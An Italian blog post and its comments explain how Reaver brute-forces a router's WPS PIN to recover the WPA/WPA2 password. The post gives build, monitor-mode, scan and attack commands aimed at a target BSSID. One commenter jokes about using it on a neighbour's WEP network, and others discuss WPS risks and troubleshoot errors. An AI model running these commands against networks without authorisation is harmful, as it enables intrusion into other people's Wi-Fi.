Reaver WPS riesce con un attaco brute force a decifrare la password wpa/wpa2 della nostra rete, in determinate condizioni. Prima di tutto il WPS o Wi-Fi Protected Setup è diffuso nei router domestici, in genere lo si trova sotto la voce wifi-protezione. La vulnerabilità si nasconde prorpio in questo standard, in quanto, se si utilizza la modalità di inserimento pin al posto del push button, questa apre una falla. Praticamente bombardando il router di pacchetti, questo restituisce molte informazioni utili al cracking. Comunque in rete si trovano spiegazioni più esaustive e dettagliate. Come prima cosa bisogna installare aircrack-ng, e compilarselo, dato che non è più presente nei repository ufficiali, oppure prelevarlo dal mio repository. Per avere quindi reaver su Debian:
$ sudo apt-get install libpcap0.8-dev libsqlite3-dev
$ wget
$ tar -xvf reaver-1.3.tar.gz
$ cd reaver-1.3/src/
$ ./configure
$ make
$ sudo make install
mettere in monitor mode la scheda:
# airmon-ng start wlan0
il comando sopra creerà mon0 in monitor mode
Interface Chipset Driver
wlan0 Ralink 2561 PCI rt61pci – [phy0]
(monitor mode enabled on mon0)
scanning per rilevare reti wpa:
# walsh -i mon0 --ignore-fcs
attacco:
# reaver -i mon0 -b 00:11:22:33:44:55 --dh-small
per altri comandi leggere la documentazione all'interno del pacchetto.
enjoy 😉
Diavolo tentatore ho scoperto da mesi una rete protetta da chiave WEP e ora tu mi servi su un piatto d’argento un piccola procedura per chiavi WPA, questo è un invito al brute forcing LOL
@picchiopc
spero che con la chiave wep, tu non ci abbia messo più di 5 minuti,
altrimenti sarai bocciato 🙂 Comunque chi si trova nel caso sopra è ad
alto rischio.
stamattina ho fatto una passeggiata con Wifi Analyzer attivato sull’iphone,
e mi sono reso conto che quasi un/terzo delle cifrature sono in WEP….robe da matti 🙂
Fortunatamente dalle mie parti le chiavi WEP sono poco usate (forse perché le diffusione nella zona di router wifi è abbastanza recente) ed esempio nel mio quartiere sono pochissime meno di 10 se dovessimo contarle. Il resto è tutto WPA.
PS: Ma che dici io non ho mai provato a sfondare quella WEP, diciamo che la tengo d’occhio in caso di assenza della rete casalinga xD
Visto che siete due provetti cracker di WI-FI 😉 mi dicevano che aggiungere come protezione il filtro per del mac address non serve a nulla… Ovviamente nella mia beata ignoranza ci sono rimasto malissimo (vabbé che con una password di 55 caratteri dovrei starmene tranquillo…); confermate?
Ciao 🙂
@Fabio
partendo dal fatto che la migliore protezione esistente è quella di spegnere
il wifi quando non ti serve :), diciamo che puoi stare tranquillo, specialmente
se hai messo anche “(!?^ì*$$%” 🙂 La vulnerabilità sopra la si ha con il wps
abilitato con il pin fino ad 8 cifre.
@fabio diciamo che aver messo una password non ha nulla a che vedere col wps.
e diciamo che molti router ultimo modello il wps lo hanno attivato di default. E diciamo che in alcuni non si può disabilitare e diciamo che in alcuni di questi il pin di default è 12345678. e diciamo che anche se hai messo la password più stramba del mondo se sei tanto sfigato da avere uno di questi router reaver te la cracca in 10 secondi.
kiddieeee alla lameronamanieraaaa
ciao ma qualcuno ha mai provato con le reti alice?
Non sempre una wep richiede 5 minuti qualche volta meno ,qualche vola di piu ,dipende…….
ciao a tutti!
io sto provando ad utilizzare reaver ,ma ottengo sempre l’errore
warning receive timeout occurred
poi
wps transaction failed (code 0x02)
e comincia a scrivere
reaver receive identity request
sending identity response
dopo una pagina così ricomincia da capo .
se spengo e riaccendo il router reaver riprende a funzionare correttamente per un po’ poi ricomincia con lo stesso problema. qualcuno sa aiutarmi?